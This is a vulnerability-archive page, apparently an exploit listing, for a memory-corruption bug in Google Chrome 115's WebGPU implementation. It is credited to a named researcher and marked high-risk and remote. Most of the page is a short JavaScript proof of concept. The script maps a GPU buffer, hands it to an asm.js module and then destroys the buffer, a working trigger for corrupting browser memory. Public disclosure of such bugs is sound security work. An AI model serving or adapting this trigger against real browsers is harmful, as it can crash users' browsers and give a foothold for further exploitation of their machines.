Google Chrome 115.0.5790.102 Memory Corruption

2023.07.25

Credit: Jean Pereira

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

<script>
/*
Google Chrome WebGPU Memory Corruption
Author: Jean Pereira <pereira.one.010@gmail.com>
Released: 2023/06/25
Vendor: https://www.google.com
Software: https://www.google.com/chrome/
Tested with version: 115.0.5790.102 (latest version)
*/

navigator.gpu.requestAdapter().then(a => {
  a.requestDevice().then(d => {
    const b = d.createBuffer({
      mappedAtCreation: true,
      size: 0x1000,
      usage: GPUBufferUsage.MAP_WRITE,
    })

    function asm(s, a, b) {
      'use asm'
      var arr = new s.Uint32Array(b)

      function nop(x) {
        x = x | 0
      }
      return nop
    }

    asm({
      Uint32Array: Uint32Array
    }, {}, b.getMappedRange())

    b.destroy()
  })
})
</script>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Google Chrome 115.0.5790.102 Memory Corruption

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.